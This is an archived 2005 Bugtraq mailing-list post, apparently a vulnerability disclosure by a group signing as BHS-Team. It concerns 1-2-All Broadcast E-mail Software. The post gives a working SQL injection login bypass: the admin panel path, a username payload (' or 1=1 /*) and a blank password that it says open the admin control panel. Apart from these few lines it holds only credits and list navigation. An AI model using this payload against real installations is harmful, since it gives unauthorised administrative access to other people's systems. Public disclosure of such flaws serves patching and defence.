1-2-All Broadcast E-mail Software vulnerable to a classic SQL admin

bhs_team_at_yahoo.com
Date: 11/11/05

  • Next message: s2b_at_hotmail.com: "Cyphor (Release: 0.19) Sql injection"
    Date: 11 Nov 2005 19:52:41 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) 1-2-All Broadcast E-mail Software ( POC )
    Supplying the following is sufficient to gain access to the admin control panel:

    Target :

    http://www.example.com/[12allTarget]/admin/index.php

    Username: ' or 1=1 /*
    Password: (Nothing)(Blank)

    Report By : POPO
    >From>IRAN> www.Babol-Hackers.com
    bhs_team@yahoo.com
    Y! ID : bhs_team , pooya_0nline
    -----------------------------------
    BHS-Team

    We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p


  • Next message: s2b_at_hotmail.com: "Cyphor (Release: 0.19) Sql injection"